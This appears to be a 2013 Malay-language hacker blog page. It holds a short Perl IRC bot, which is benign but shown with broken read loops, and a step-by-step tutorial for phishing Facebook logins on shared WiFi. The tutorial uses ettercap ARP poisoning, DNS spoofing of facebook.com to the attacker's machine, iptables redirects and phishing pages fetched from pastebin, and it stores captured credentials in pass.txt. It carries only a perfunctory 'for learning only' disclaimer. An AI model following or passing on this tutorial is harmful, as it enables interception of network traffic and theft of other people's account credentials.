shah RileksCrew: 2013

#!/usr/local/bin/perl -w

# irc.pl

# A simple IRC robot

.# Usage: perl irc.pl

use strict;

# We will use a raw socket to connect to the IRC server.

use IO::Socket;

# The server to connect to and our details.

my $server = "irc.kampungchat.org";

my $nick = "Perlbot";

my $login = "perl";

# The channel which the bot will join.

my $channel = "#opensource";

# Connect to the IRC server.

my $sock = new IO::Socket::INET(PeerAddr => $server,

PeerPort => 6667,

Proto => 'tcp') or

die "Can't connect\n";

# Log on to the server.

print $sock "NICK $nick\r\n";

print $sock "USER $login 8 * :shah Perl IRC Robot\r\n";

# Read lines from the server until it tells us we have connected.

while (my $input = ) {

# Check the numerical responses from the server.

if ($input =~ /004/) {

# We are now logged in.

last;

}

elsif ($input =~ /433/) { die "Nickname is already in use.";

}

# Join the channel.

print $sock "JOIN $channel\r\n";

# Keep reading lines from the server.

while (my $input = ) {

chop $input;

if ($input =~ /^PING(.*)$/i) {

# We must respond to PINGs to avoid being disconnected.

print $sock "PONG $1\r\n";

}

else {

# Print the raw line received by the bot.

print "$input\n";

}

########################################################

# Tutorial phishing facebook dlm wifi dengan teknik DNS spoofing

# Tested di OS ubuntu 11.04 Natty Narwhal by Shah Linux

########################################################

Peralatan yang perlu disediakan ialah:-

1. Install apache server ( root@shah:~$sudo apt-get install apache2 )

2. Install php ( root@shah:~$sudo apt-get install php5 )

3. Install ettercap ( root@shah:~$sudo apt-get install ettercap )

4. Script phishing facebook boleh ambil di sini index.php ( http://pastebin.com/zMXSZEYN ) dan login.php ( http://pastebin.com/ZkhZJuBW )

5. Sekiranya apache server dan php dah di install, buka browser mozilla anda dan taip http://localhost .

6. Kalau keluar "Its work" itu tandanya apache dan php anda siap untuk di inject dgn file2 phishing :P.

7. Pindahkan file index.php dan login.php tadi ke dlm server apache dlm localhost kita. ;]

8. Pastikan file index.php dan login.php berada dlm /var/www/ atau bleh check root@shah:~$cd /var/www/dan taip ls ;]

9. Sekarang kita kena configure ettercap yg kita install td

10. Taip dlm terminal: root@shah:~$gedit /etc/etter.conf

11. Cari dan ubah dari:-

#---------------

# Linux

#---------------

# if you use ipchains:

#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Buang tanda "#" menjadi:-

#---------------

# Linux

#---------------

# if you use ipchains:

redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

12. Buang tanda "#" sebagai mengaktifkan script

13. Edit file etter.dns atau melalui terminal: root@ubuntu:~#gedit /usr/share/ettercap/etter.dns

Tambah:-

########################start########################

facebook.com A 192.168.1.100

*.facebook.com A 192.168.1.100

www.facebook.com PTR 192.168.1.100 # Wildcards in PTR are not allowed

#########################end########################

facebook.com (domain yg akan kita poisoning apabila mangsa buka di browser)

192.168.1.100 (ip address kita)

14. Save etter.dns tadi yg telah kita edit. ;]

15. Lihat semula di dlm folder /var/www/ dan tambah file pass.txt.

16. Caranya taip "gedit pass.txt" dan save.

17. Execute file pass.txt dgn cmd:

root@shah:/var/www#touch pass.txt

root@shah:/var/www#chmod 777 pass.txt

18. Buka dan setting ettercap > "sniff" pilih unified sniffing dan pilih wlan0/eth0 > plugins pilih manage the plugins > Klik autoadd dan dns_spoof > pergi kat Hosts dan scan for hosts > klik host lists > add target 1 and target 2 dan target seterusnya > pergi ke Mitm klik Arp poisoning dan select sniff remote connections > pergi ke start dan start sniffing ;]

19. root@shah:~#sudo nano /proc/sys/net/ipv4/ip_forward

Ubah angka kpd angka 1 dan save (CTRLX+yes+enter)

20. Boleh test dengan taip kat browser http://localhost dan anda akan nampak page facebook phishing td :P contoh: https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-ash4/s480x480/388430_482163325166150_519964980_n.jpg

21. Cuba login email dan password...email dan pass anda masukkan tadi boleh lihat di dalam http://localhost/pass.txt contoh: https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash4/392883_482163755166107_1364890005_n.jpg ;]

22. Ini hanyalah utk pembelajaran sahaja dan saya tidak bertanggungjwb diatas apa yang akan anda lakukan :P

./sharing is caring

-=[shah RileksCrew]=-

##############################EOF####################

Pages

Monday 15 April 2013

perl IRC bot

Tutorial phishing facebook dlm wifi dengan teknik DNS spoofing ;]

Install psyBNC di dalam shell

Followers

About Me